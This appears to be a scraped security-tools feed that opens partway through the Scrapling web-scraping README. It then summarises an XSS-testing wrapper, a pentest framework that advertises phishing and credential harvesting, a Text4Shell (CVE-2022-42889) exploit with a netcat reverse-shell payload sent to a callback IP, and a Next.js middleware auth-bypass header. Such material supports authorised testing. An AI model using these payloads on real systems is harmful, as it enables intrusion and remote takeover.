<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
    ...  # do something with it

You can also search for a specific ancestor of an element that satisfies a function. All you need to do is pass a function that takes an Adaptor object as an argument and returns True if the condition is satisfied or False otherwise, like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element whose text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements whose text content matches my price regex
[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
        print({
            "name": product.css_first('h3 a::text'),
            "price": product.css_first('.price_color').re_first(r'[\d\.]+'),
            "stock": product.css('.availability::text')[-1].clean()
        })
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
  <section class="products">
    <article class="product" id="p1">
      <h3>Product 1</h3>
      <p class="description">Description 1</p>
    </article>
    <article class="product" id="p2">
      <h3>Product 2</h3>
      <p class="description">Description 2</p>
    </article>
  </section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
  <div class="product-wrapper">
    <section class="products">
      <article class="product new-class" data-id="p1">
        <div class="product-info">
          <h3>Product 1</h3>
          <p class="new-description">Description 1</p>
        </div>
      </article>
      <article class="product new-class" data-id="p2">
        <div class="product-info">
          <h3>Product 2</h3>
          <p class="new-description">Description 2</p>
        </div>
      </article>
    </section>
  </div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor

# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1', auto_save=True)

if not element:  # One day the website changes?
    element = page.css('#p1', auto_match=True)  # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.

To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverflow's website from 2010, pretty old, huh? Let's test if the auto-match feature can extract the same button from the 2010 design and the current design using the same selector :)

If I want to extract the Questions button from the old design, I can use a selector like this: #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a. This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions.

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain. This is because, to Scrapling, these are two different URLs rather than one website, so it isolates their data. To tell Scrapling they are the same website, we pass the domain we want to use for saving the auto-match data for both, so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes:

  1. For the two examples above, I used the Adaptor class once and the Fetcher class the other time, to show that you can create the Adaptor object yourself if you have the source, or fetch the source using any Fetcher class, which then creates the Adaptor object for you.
  2. Passing the auto_save argument with the auto_match argument set to False while initializing the Adaptor/Fetcher object results in the auto_save argument value being ignored with the following warning message: "Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info." This behavior is purely for performance reasons, so the database gets created/connected only when you are planning to use the auto-matching features. The same applies to the auto_match argument.
  3. The auto_match parameter works only on Adaptor instances, not Adaptors objects (element lists), so something like page.css('body').css('#p1', auto_match=True) will raise an error because you can't auto-match a whole list; you have to be specific and do something like page.css_first('body').css('#p1', auto_match=True).

Find elements by filters

Inspired by BeautifulSoup's find_all function you can find elements by using find_all/find methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.

  • To be more specific:
  • Any string passed is considered a tag name
  • Any iterable passed like List/Tuple/Set is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element(s) attribute names and attribute values.
  • Any regex patterns passed are used as filters to elements by their text content
  • Any functions passed are used as filters
  • Any keyword argument passed is considered as an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements whose text content matches all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that have at least one child.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in their content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods but you have to set the identifier by yourself.

  • To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')

  • Now later when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
  • if you want to keep it as lxml.etree object, leave the adaptor_type argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it ) Hence all of these methods are methods from the TextHandler within that contains the text content so the same can be done directly if you call the .text property or equivalent selector function.

  • Doing operations on the text content itself includes

  • Cleaning the text from any white spaces and replacing consecutive spaces with single space python quote.clean()
  • You already know about the regex matching and the fast json parsing but did you know that all strings returned from the regex search are actually TextHandler objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
  • Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.

  • Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler that's read-only so it's faster and string values returned are actually TextHandler objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can search by values too and can do partial searches. It might be handy in some cases (returns a generator of matches) python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
  • Serialize the current attributes to JSON bytes: python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
  • Converting it to a normal dictionary python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to keep this as short as possible, so to take a deep dive, head to the docs section. I will try to keep it as up to date as possible and add complex examples. There, I will explain points like how to write your own storage system, how to write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚑ Enlightening Questions and FAQs

This section addresses common questions about Scrapling, please read this section before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with the css or xpath methods with the auto_save parameter set to True, before structural changes happen.
  2. Before returning results to you, Scrapling uses its configured database to save unique properties of that element.
  3. Because everything about the element can be changed or removed, nothing from the element itself can be used as a unique identifier in the database. To solve this issue, the storage system relies on two things:

     1. The domain of the URL you gave while initializing the first Adaptor object.
     2. The identifier parameter you passed to the method while selecting. If you didn't pass one, the selector string itself is used as the identifier, but remember that you will have to use it as the identifier value later, when the structure changes and you want to pass the new selector.

     Together, both are used to retrieve the element's unique properties from the database later.
  4. Later, when you enable the auto_match parameter for both the Adaptor instance and the method call, the element's properties are retrieved, and Scrapling loops over all elements in the page, comparing each one's unique properties to the unique properties already stored for this element; a score is calculated for each one.
  5. Comparing elements is not exact but about finding how similar the values are, so everything is taken into consideration, even the order of values, like the order in which the element's class names were written before versus the order in which they are written now.
  6. The score for each element is stored in a table, and the element(s) with the highest combined similarity scores are returned (see the toy sketch after this list).
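
As a toy illustration of that scoring idea only (not Scrapling's actual algorithm, stored property set, or weights), consider comparing saved properties against a candidate element:

# Toy illustration of similarity scoring; Scrapling's real algorithm,
# stored properties, and weights are internal and more sophisticated.
def similarity(saved: dict, candidate: dict) -> float:
    """Score a candidate element against saved properties (0..1)."""
    scores = []
    for key, value in saved.items():
        other = candidate.get(key)
        if isinstance(value, (list, tuple)):
            # Overlap ratio for multi-valued properties, e.g. class names.
            union = set(value) | set(other or ())
            scores.append(len(set(value) & set(other or ())) / max(len(union), 1))
        else:
            scores.append(1.0 if value == other else 0.0)
    return sum(scores) / len(scores)

saved = {'tag': 'article', 'classes': ['product'], 'parent_tag': 'section'}
candidate = {'tag': 'article', 'classes': ['product', 'new-class'], 'parent_tag': 'section'}
print(round(similarity(saved, candidate), 2))  # 0.83 -> still a strong match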

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem, as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you later use the same identifier for a different website that you also didn't pass a URL for while initializing. The save process will overwrite the previous data, and auto-matching uses only the latest saved properties.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract:
  • The element's tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only).
  • The element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object results in the argument being ignored. This behavior is purely for performance reasons, so the database gets created only when you plan to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons:
  1. No data was saved/stored for this element before.
  2. The selector passed is not the one used while storing the element's data. The solution is simple (see the sketch below):
    • Pass the old selector again as an identifier to the method called.
    • Retrieve the element with the retrieve method, using the old selector as the identifier, then save it again with the save method and the new selector as the identifier.
    • Start using the identifier argument more often if you plan to use every new selector from now on.
  3. The website had some extreme structural changes, like a full redesign. If this happens a lot with this website, the solution is to make your code as selector-free as possible, using Scrapling's features.
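For the second case, a hypothetical sketch of re-associating saved data with a new selector, using the retrieve and save methods named above (their exact signatures are assumptions):

# Hypothetical: retrieve saved properties under the old selector,
# then re-save them under the new one.
props = page.retrieve('div.old-selector')
page.save(props, 'div.new-selector')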

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course. You can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later, like the model feature in AutoScraper. I pulled all the top articles about AutoScraper from Google and tested Scrapling against the examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its own state.

More Sponsors!

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from:
  • Parsel (BSD License): used for the translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, only the unique properties of the first element from the selection results get saved. So if the selector you are using matches different elements on the page in different locations, auto-matching will probably return only the first element when you relocate it later. This doesn't include combined CSS selectors (using commas to combine more than one selector, for example), as these selectors get separated and each one is executed alone.

Designed & crafted with ❀️ by Karim Shoair.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing

By: Unknown β€” April 27th 2025 at 12:30


VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.


Features

  • Supports pipe input for passing file lists and echoing URLs for testing
  • Configurable retries and timeouts
  • Supports GET, POST, and BOTH HTTP methods
  • Advanced Filter Bypass (AFB) feature
  • Flash Mode for quick XSS polyglot testing
  • CheckPoC feature to verify the proof of concept
  • Concurrent processing with configurable parallelism
  • Custom headers support for authenticated requests
  • Proxy support
  • Discord webhook integration for notifications
  • Detailed output with color-coded results

Installation

go install github.com/iqzer0/vulnknox@latest

Configuration

Before using the tool, you need to set up your configuration:

API Key

Obtain your KNOXSS API key from knoxss.me.

On the first run, a default configuration file will be created at:

Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE with your actual API key.

Discord Webhook (Optional)

If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.

Usage

Usage of vulnknox:

-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value&param2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)

Basic Examples

Test a single URL using GET method:

vulnknox -u "https://example.com/page?param=value"

Test a URL with POST data:

vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1&param2=value2"

Enable Advanced Filter Bypass and Flash Mode:

vulnknox -u "https://example.com/page?param=value" -afb -flash

Use custom headers (e.g., for authentication):

vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"

Process URLs from a file with 5 concurrent processes:

vulnknox -i urls.txt -p 5

Send notifications to Discord on successful XSS findings:

vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"

Advanced Usage

Test both GET and POST methods with CheckPoC enabled:

vulnknox -u "https://example.com/page" -X BOTH -checkpoc

Use a proxy and increase the number of retries:

vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5

Suppress the banner and only show successful XSS payloads:

vulnknox -u "https://example.com/page?param=value" -no-banner -s

Output Explanation

[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.

The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.

Contributing

Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.

License

This project is licensed under the MIT License.

Credits

@KN0X55
@BruteLogic
@xnl_h4ck3r



☐ β˜† βœ‡ KitPloit - PenTest Tools!

PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More

By: Unknown β€” April 24th 2025 at 12:30


[ASCII-art banner: PEGASUS-NEO]

PEGASUS-NEO Penetration Testing Framework


πŸ›‘οΈ Description

PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.

⚠️ Legal Disclaimer

This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.

Developers assume no liability and are not responsible for any misuse or damage caused by this program.

πŸ”’ Copyright Notice

PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.

This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.

Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024

🌟 Features

Password: Sobri

  • Reconnaissance & OSINT
    • Network scanning
    • Email harvesting
    • Domain enumeration
    • Social media tracking
  • Exploitation & Pentesting
    • Automated exploitation
    • Password attacks
    • SQL injection
    • Custom payload generation
  • Wireless Attacks
    • WiFi cracking
    • Evil twin attacks
    • WPS exploitation
  • Web Attacks
    • Directory scanning
    • XSS detection
    • SQL injection
    • CMS scanning
  • Social Engineering
    • Phishing templates
    • Email spoofing
    • Credential harvesting
  • Tracking & Analysis
    • IP geolocation
    • Phone number tracking
    • Email analysis
    • Social media hunting

πŸ”§ Installation

# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git

# Change directory
cd pegasus-neo

# Install dependencies
sudo python3 -m pip install -r requirements.txt

# Run the tool
sudo python3 pegasus_neo.py

πŸ“‹ Requirements

  • Python 3.8+
  • Linux Operating System (Kali/Ubuntu recommended)
  • Root privileges
  • Internet connection

πŸš€ Usage

  1. Start the tool:
sudo python3 pegasus_neo.py
  2. Enter the authentication password
  3. Select a category from the main menu
  4. Choose a specific tool or module
  5. Follow the on-screen instructions

πŸ” Security Features

  • Source code protection
  • Integrity checking
  • Anti-tampering mechanisms
  • Encrypted storage
  • Authentication system

πŸ› οΈ Supported Tools

Reconnaissance & OSINT

  • Nmap
  • Wireshark
  • Maltego
  • Shodan
  • theHarvester
  • Recon-ng
  • SpiderFoot
  • FOCA
  • Metagoofil

Exploitation & Pentesting

  • Metasploit
  • SQLmap
  • Commix
  • BeEF
  • SET
  • Hydra
  • John the Ripper
  • Hashcat

Wireless Hacking

  • Aircrack-ng
  • Kismet
  • WiFite
  • Fern Wifi Cracker
  • Reaver
  • Wifiphisher
  • Cowpatty
  • Fluxion

Web Hacking

  • Burp Suite
  • OWASP ZAP
  • Nikto
  • XSStrike
  • Wapiti
  • Sublist3r
  • DirBuster
  • WPScan

πŸ“ Version History

  • v1.0.0 (2024-01) - Initial release
  • v1.1.0 (2024-02) - Added tracking modules
  • v1.2.0 (2024-03) - Added tool installer

πŸ‘₯ Contributing

This is a proprietary project and contributions are not accepted at this time.

🀝 Support

For support, please email muhammadsobrimaulana31@gmail.com or visit https://lynk.id/muhsobrimaulana

βš–οΈ License

This project is protected under a proprietary license. See the LICENSE file for details.

Made with ❀️ by Letda Kes dr. Sobri



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown β€” April 23rd 2025 at 12:30


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against:
  • Apache Commons Text < 1.10.0
  • Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a listener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell is sent via /data parameter using a POST request.
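For illustration, a hedged Python sketch of how such a request could be built (the target URL is a placeholder, and the vulnerable parameter name and path vary per target, as noted above):

import requests

target = "http://127.0.0.1:8080"          # placeholder for the vulnerable app
cmd = "nc 192.168.1.2 4444 -e /bin/bash"  # reverse shell back to your listener

# ${script:...} expression evaluated by a vulnerable StringSubstitutor
payload = "${script:javascript:java.lang.Runtime.getRuntime().exec('" + cmd + "')}"

response = requests.post(target + "/data", data={"data": payload}, timeout=10)
print(response.status_code)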



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)

By: Unknown β€” April 22nd 2025 at 12:30


A Python script to check Next.js sites for the corrupt middleware vulnerability (CVE-2025-29927).

The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by sending a custom header, x-middleware-subrequest.

Next.js versions affected:
  • 11.1.4 and up
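As a quick illustration of the check, a hedged Python sketch; the header value (the middleware name repeated to exhaust Next.js's internal recursion limit) follows public CVE-2025-29927 write-ups and may need adjusting per target:

import requests

url = "https://example.com/admin"  # protected path
bypass = {"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"}

normal = requests.get(url, allow_redirects=False, timeout=10)
bypassed = requests.get(url, headers=bypass, allow_redirects=False, timeout=10)

# A route that normally redirects or denies (e.g., 307/401) but returns 200
# with the header is likely vulnerable.
print(normal.status_code, bypassed.status_code)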

[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.


Installation

Clone the repo

git clone https://github.com/takumade/ghost-route.git
cd ghost-route

Create and activate virtual environment

python -m venv .venv
source .venv/bin/activate

Install dependencies

pip install -r requirements.txt

Usage

python ghost-route.py <url> <path> <show_headers>
  • <url>: Base URL of the Next.js site (e.g., https://example.com)
  • <path>: Protected path to test (default: /admin)
  • <show_headers>: Show response headers (default: False)

Example

Basic Example

python ghost-route.py https://example.com /admin

Show Response Headers

python ghost-route.py https://example.com /admin True

License

MIT License

